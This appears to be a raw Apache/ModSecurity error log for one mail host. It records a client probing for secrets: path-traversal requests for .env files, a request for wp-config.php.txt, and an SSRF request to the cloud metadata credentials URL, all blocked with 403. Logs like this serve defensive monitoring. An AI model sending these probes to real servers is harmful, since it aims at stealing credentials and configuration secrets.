[Tue May 12 02:22:33.037653 2026] [security2:error] [pid 1695975:tid 1695995] [client 45.148.10.244:57018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxdVI9ymHBxup74-HRQAAAJE"]
[Tue May 12 02:22:33.173475 2026] [security2:error] [pid 1691274:tid 1691285] [client 45.148.10.244:57134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxVfdQaraX_prmqcZawAAAAg"]
[Tue May 12 02:22:33.540398 2026] [security2:error] [pid 1695975:tid 1695992] [client 45.148.10.244:57178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxdVI9ymHBxup74-HRgAAAI4"]
[Tue May 12 02:22:33.697523 2026] [security2:error] [pid 1730175:tid 1730191] [client 45.148.10.244:57162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxXo6NvB9WXx5V-50jQAAAQ4"]
[Tue May 12 02:22:35.739506 2026] [security2:error] [pid 1709071:tid 1709110] [client 45.148.10.244:57198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxbvMumyrWMfSu7qjIQAAANc"]
[Tue May 12 02:22:36.236470 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.244:57068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxTue9Sp-pIv_Bb6KIQAAAU8"]
[Tue May 12 02:22:36.931256 2026] [security2:error] [pid 1691274:tid 1691287] [client 45.148.10.244:57262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyx1fdQaraX_prmqcZfAAAAAo"]
[Tue May 12 02:22:36.955656 2026] [security2:error] [pid 1691274:tid 1691279] [client 45.148.10.244:57494] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.krakoukas.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJyzFfdQaraX_prmqcZkQAAAAI"]
[Tue May 12 02:22:36.966832 2026] [core:error] [pid 1695975:tid 1695991] [client 45.148.10.244:57412] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 02:22:36.967356 2026] [security2:error] [pid 1709071:tid 1709111] [client 45.148.10.244:57380] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.production.local"] [unique_id "agJyzLvMumyrWMfSu7qjNQAAANg"]
[Tue May 12 02:22:36.967489 2026] [security2:error] [pid 1709071:tid 1709111] [client 45.148.10.244:57380] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.production.local"] [unique_id "agJyzLvMumyrWMfSu7qjNQAAANg"]
[Tue May 12 02:22:36.968957 2026] [security2:error] [pid 1709071:tid 1709094] [client 45.148.10.244:57430] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env#"] [unique_id "agJyzLvMumyrWMfSu7qjNgAAAMc"]
[Tue May 12 02:22:36.969106 2026] [security2:error] [pid 1709071:tid 1709094] [client 45.148.10.244:57430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env#"] [unique_id "agJyzLvMumyrWMfSu7qjNgAAAMc"]
[Tue May 12 02:22:36.969607 2026] [security2:error] [pid 1691274:tid 1691279] [client 45.148.10.244:57494] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.krakoukas.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJyzFfdQaraX_prmqcZkQAAAAI"]
[Tue May 12 02:22:36.969665 2026] [security2:error] [pid 1691274:tid 1691279] [client 45.148.10.244:57494] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.krakoukas.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJyzFfdQaraX_prmqcZkQAAAAI"]
[Tue May 12 02:22:36.969721 2026] [security2:error] [pid 1691274:tid 1691279] [client 45.148.10.244:57494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJyzFfdQaraX_prmqcZkQAAAAI"]
[Tue May 12 02:22:36.974747 2026] [security2:error] [pid 1691274:tid 1691279] [client 45.148.10.244:57494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJyzFfdQaraX_prmqcZkQAAAAI"]
[Tue May 12 02:22:37.641710 2026] [security2:error] [pid 1730207:tid 1730225] [client 45.148.10.244:57426] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/wp-config.php.txt"] [unique_id "agJyzTue9Sp-pIv_Bb6KNwAAAVA"]
[Tue May 12 02:22:37.641911 2026] [security2:error] [pid 1730207:tid 1730225] [client 45.148.10.244:57426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/wp-config.php.txt"] [unique_id "agJyzTue9Sp-pIv_Bb6KNwAAAVA"]
[Tue May 12 02:22:40.386626 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.244:57282] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyx7OxS7i6i_mT2NLDMwAAAEw"]
[Tue May 12 02:22:41.450989 2026] [security2:error] [pid 1691274:tid 1691280] [client 45.148.10.244:46828] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.krakoukas.com"] [uri "/_next/image/"] [unique_id "agJy0VfdQaraX_prmqcZmwAAAAM"]
[Tue May 12 02:22:41.466692 2026] [security2:error] [pid 1691274:tid 1691280] [client 45.148.10.244:46828] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/_next/image/"] [unique_id "agJy0VfdQaraX_prmqcZmwAAAAM"]
[Tue May 12 02:22:41.980933 2026] [security2:error] [pid 1730175:tid 1730198] [client 45.148.10.244:57294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyyHo6NvB9WXx5V-50mAAAARU"]
[Tue May 12 02:22:42.023778 2026] [core:error] [pid 1730175:tid 1730186] [client 20.226.81.141:47612] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:42.023825 2026] [core:error] [pid 1730175:tid 1730186] [client 20.226.81.141:47612] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:43.322864 2026] [core:error] [pid 1695975:tid 1695985] [client 20.226.81.141:47580] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:43.322933 2026] [core:error] [pid 1695975:tid 1695985] [client 20.226.81.141:47580] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:44.010047 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.244:57266] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyx3o6NvB9WXx5V-50lQAAARM"]
[Tue May 12 02:22:44.073452 2026] [security2:error] [pid 1695975:tid 1695996] [client 45.148.10.244:57182] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyx9VI9ymHBxup74-HTgAAAJI"]
[Tue May 12 02:22:44.783954 2026] [core:error] [pid 1695975:tid 1695981] [client 20.226.81.141:47573] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:44.783994 2026] [core:error] [pid 1695975:tid 1695981] [client 20.226.81.141:47573] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:44.893163 2026] [security2:error] [pid 1707624:tid 1707683] [client 45.148.10.244:57300] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyyLOxS7i6i_mT2NLDNQAAAEE"]
[Tue May 12 02:22:44.910672 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.244:57322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyyFfdQaraX_prmqcZgQAAAAY"]
[Tue May 12 02:22:45.169794 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.244:57316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyyHo6NvB9WXx5V-50lwAAARI"]
[Tue May 12 02:22:45.353366 2026] [security2:error] [pid 1691274:tid 1691282] [client 45.148.10.244:57360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyyFfdQaraX_prmqcZggAAAAU"]
[Tue May 12 02:22:45.777522 2026] [security2:error] [pid 1709071:tid 1709104] [client 45.148.10.244:57372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyyLvMumyrWMfSu7qjLQAAANE"]
[Tue May 12 02:22:45.958359 2026] [security2:error] [pid 1695975:tid 1695983] [client 45.148.10.244:57346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyyNVI9ymHBxup74-HUAAAAIU"]
[Tue May 12 02:22:46.442981 2026] [core:error] [pid 1707624:tid 1707684] [client 20.226.81.141:47577] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:46.443015 2026] [core:error] [pid 1707624:tid 1707684] [client 20.226.81.141:47577] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:47.122735 2026] [security2:error] [pid 1691274:tid 1691278] [client 45.148.10.244:57080] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyx1fdQaraX_prmqcZgAAAAAE"]
[Tue May 12 02:22:48.190222 2026] [security2:error] [pid 1707624:tid 1707702] [client 45.148.10.244:57298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyyLOxS7i6i_mT2NLDNgAAAFQ"]
[Tue May 12 02:22:48.226466 2026] [core:error] [pid 1707624:tid 1707697] [client 20.226.81.141:36154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:48.240367 2026] [core:error] [pid 1707624:tid 1707697] [client 20.226.81.141:36154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:49.303187 2026] [core:error] [pid 1695975:tid 1695981] [client 20.226.81.141:36120] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:49.303220 2026] [core:error] [pid 1695975:tid 1695981] [client 20.226.81.141:36120] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:50.220365 2026] [security2:error] [pid 1709071:tid 1709094] [client 45.148.10.244:57430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyzLvMumyrWMfSu7qjNgAAAMc"]
[Tue May 12 02:22:50.560020 2026] [core:error] [pid 1709071:tid 1709089] [client 20.226.81.141:47567] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:50.560063 2026] [core:error] [pid 1709071:tid 1709089] [client 20.226.81.141:47567] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:51.210772 2026] [security2:error] [pid 1730207:tid 1730225] [client 45.148.10.244:57426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyzTue9Sp-pIv_Bb6KNwAAAVA"]
